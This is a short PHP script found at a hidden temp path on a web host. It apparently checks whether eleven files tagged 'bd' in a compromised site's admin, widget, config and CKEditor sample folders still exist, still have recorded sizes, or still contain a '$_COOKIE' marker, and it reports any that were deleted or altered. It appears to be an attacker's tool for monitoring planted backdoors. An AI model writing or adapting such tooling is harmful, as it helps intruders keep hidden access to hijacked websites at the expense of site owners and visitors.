/home/kkco/.cagefs/tmp/.reset
<?php   $r = '/home/kkco/public_html/biayakuliah'; $x = ["/widget/kontak_2.php"=>"bd@@46083@@903",
"/admin/loginaction.php"=>"bd@@46864@@61",
"/config.php"=>"bd@@47135@@94",
"/admin/ckeditor/samples/old/sample.posteddata.php"=>"bd@@47394@@1631",
"/admin/ckeditor/samples/old/sample_posteddata.php"=>"bd@@47194@@45",
"/admin/include/stats.php"=>"bd@@47450@@1047",
"/page/html.php"=>"bd@@46985@@$_COOKIE[5",
"/admin/page/artikel.edit.php"=>"bd@@47540@@970",
"/sitemap.php"=>"bd@@47048@@40",
"/admin/ckeditor/samples/old/assets/contact_messages.php"=>"bd@@47329@@1619",
"/widget/default_graph.php"=>"bd@@47596@@1618"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');